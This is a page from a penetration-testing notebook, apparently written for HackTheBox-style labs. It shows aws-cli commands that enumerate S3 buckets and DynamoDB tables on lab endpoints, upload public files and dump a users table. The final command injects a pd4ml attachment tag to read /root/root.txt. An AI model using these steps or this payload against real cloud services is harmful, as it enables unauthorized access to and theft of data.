🔮
P4n1cBook
  • 🏴‍☠️Welcome!
    • 🔮P4n1cBook
    • 📚Bookmarks
    • 🚨Licence and Disclaimer
  • Fundamentals
    • Starter Kit
      • Linux
      • PowerShell
      • Git
      • 💾Regex
      • curl
      • tcpdump
      • Nmap
      • 🦈Wireshark
      • Metasploit
    • 🌐Network Protocols
      • ICMP
      • SSH
      • Telnet
      • DNS
      • FTP
      • HTTP/HTTPS
      • SMB
      • SNMP
      • SMTP
      • NFS
      • IPP
      • WinRM
      • LLMNR
    • Code
      • Python Essentials
      • C & C++
    • Web APIs
      • GraphQL
    • Shells/TTYs
    • Dorks
    • Cryptography
    • Reverse Engineering
      • GDB
      • Binaries
  • Web Exploitation
    • Web Enumeration
    • Web Fuzzing
      • ffuf
      • feroxbuster
      • Gobuster
      • GoWitness
    • Main Techniques
      • Arbitrary File Read
      • Session Hijacking
      • SSRF
      • Eval Injection
      • Template Manipulation
      • Path Traversal
      • Prototype Pollution
      • XXE
      • Deserialization
      • Log Poisoning
      • Command Injection
      • SQLi
        • SQLmap
      • Arbitrary File Upload
      • SSTI
      • LFI
      • XSS
    • Web Servers
      • Apache
      • Nginx
      • Werkzeug
    • Web Services/Frameworks
      • Wordpress
      • Laravel
      • Express
      • Magento
      • AIOHTTP
      • HashiCorp Vault
      • Tiny File Manager
      • Joomla
      • CMS Made Simple
      • 🌵Cacti
      • Tomcat
      • Zabbix
      • OpenNetAdmin
      • ImageMagick
    • Databases
      • MySQL
      • NoSQL
        • MongoDB
        • Redis
    • Java-based web application
      • pd4ml.jar
      • Struts
      • .WAR
      • JDWP
  • Cloud Exploitation
    • Kubernetes
    • AWS
  • Post Exploitation
    • File Transfer
      • Exfiltration
    • Credential Dumping
      • Thunderbird
    • Lateral Movement
    • Persistence
    • Linux Privilege Escalation
      • Static Binaries
      • Enumeration
      • Hijacks
      • Command Injection
      • Jailbreaks
      • Binary Exploitation - Linux
      • Kernel Exploits
      • Buffer Overflow - Linux
      • Docker
      • Abusing Wildcards
  • Wireless Exploitation
    • NFC
Powered by GitBook
On this page
Edit on GitHub
  1. Cloud Exploitation

AWS

aws-cli

Set it up remotely

Set the ID
aws configure set aws_access_key_id health
Set the key
aws configure set aws_secret_access_key 444af250749d

Enumeration

List the buckets romotetly
aws s3 ls --endpoint-url http://s3.bucket.htb/
List buckets locally
aws s3 ls s3://BUCKET_Name/
List the bucket's content
aws s3 ls s3://adserver --endpoint-url http://s3.bucket.htb/
Upload a file
aws s3 cp FILE_NAME s3://BUCKET_NAME/
Upload it and make it public
aws s3 cp tokyo s3://adserver/ --endpoint-url http://s3.bucket.htb --acl public-read
Remove a file
aws s3 rm s3://Bucket_Name/FILE_NAME
Dynamodb

Set the Dynamodb instance

Set the ID
export AWS_ACCESS_KEY_ID=health
Set the key
export AWS_SECRET_ACCESS_KEY=444af250749d
Set the region
export AWS_DEFAULT_REGION=us-east-1
Set the endpoint
export AWS_ENDPOINT_URL=http://localhost:4566

Enumeration

List the tables
aws dynamodb list-tables --endpoint-url http://localhost:4566
List the users
aws dynamodb scan --table-name users --endpoint-url http://localhost:4566
Create a table
aws --endpoint-url http://s3.bucket.htb dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5

Create an 

aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src=\"/root/root.txt\" description=\"attachment sample\" icon=\"Paperclip\"/></html>"}}'
PreviousKubernetesNextFile Transfer

Last updated 3 days ago